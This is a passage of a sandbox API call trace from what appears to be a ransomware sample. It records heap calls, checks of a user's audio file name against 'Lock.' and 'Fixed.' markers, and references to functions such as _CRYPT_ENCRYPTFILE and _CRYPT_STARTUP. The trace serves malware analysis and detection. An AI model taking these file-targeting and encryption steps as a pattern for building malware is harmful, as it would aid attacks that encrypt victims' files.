0x2e50c20 [0244.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0244.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0244.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0244.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J0 iAXcBYZXSdt.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0244.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0 iAXcBYZXSdt.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0244.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" iAXcBYZXSdt.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0244.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAXcBYZXSdt.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0244.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AXcBYZXSdt.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0244.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XcBYZXSdt.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0244.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cBYZXSdt.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0244.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYZXSdt.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0244.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZXSdt.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0244.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZXSdt.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0244.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XSdt.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0244.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sdt.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0244.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0244.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0244.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0244.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0244.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0244.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0244.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0244.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0244.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0244.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0244.783] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0244.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0244.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0244.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0244.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0244.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J0 iAXcBYZXSdt.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0244.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0 iAXcBYZXSdt.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0244.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" iAXcBYZXSdt.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0244.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAXcBYZXSdt.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0244.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AXcBYZXSdt.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0244.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XcBYZXSdt.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0244.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cBYZXSdt.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0244.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYZXSdt.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0244.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZXSdt.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0244.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZXSdt.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0244.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XSdt.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0244.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sdt.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0244.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0244.784] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ab0 [0244.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0244.784] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0244.784] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0244.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0244.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0244.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0244.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0244.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0244.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0244.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0244.784] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0244.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0244.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0244.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0244.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0244.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0244.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0244.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e58910 [0244.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0245.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0245.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0245.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0245.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0245.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0245.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0245.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0245.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0245.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0245.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0245.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0245.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0245.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0245.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0245.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0245.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0245.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0245.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0245.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0245.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0245.013] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0245.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0245.013] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0245.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0245.014] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\J0 iAXcBYZXSdt.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de63b00, ftCreationTime.dwHighDateTime=0x1d5e891, ftLastAccessTime.dwLowDateTime=0x4166dab0, ftLastAccessTime.dwHighDateTime=0x1d5eea2, ftLastWriteTime.dwLowDateTime=0x4166dab0, ftLastWriteTime.dwHighDateTime=0x1d5eea2, nFileSizeHigh=0x0, nFileSizeLow=0x10d6c, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="J0 iAXcBYZXSdt.wav", cAlternateFileName="J0IAXC~1.WAV")) returned 0xa86f50 [0245.014] FindClose (in: hFindFile=0xa86f50 | out: hFindFile=0xa86f50) returned 1 [0245.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0245.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0245.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0245.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0245.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0245.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0245.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0245.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0245.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0245.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0245.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0245.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0245.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0245.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0245.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0245.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.016] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0245.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0245.016] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0245.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0245.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0245.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0245.016] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0245.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0245.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0245.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0245.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0245.016] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0245.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0245.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0245.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0245.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0245.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0245.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0245.017] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0245.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0245.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0245.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0245.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0245.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0245.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0245.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0245.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0245.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0245.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0245.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0245.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0245.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0245.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0245.018] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0245.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0245.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0245.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0245.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0245.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.019] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.019] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ce0 [0245.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0245.019] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0245.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ce0 | out: hHeap=0x970000) returned 1 [0245.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0245.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0245.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0245.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0245.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0245.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0245.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0245.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0245.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0245.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0245.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0245.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0245.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0245.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0245.020] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0245.020] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0245.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0245.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0245.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0245.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0245.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0245.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0245.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0245.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0245.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.021] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 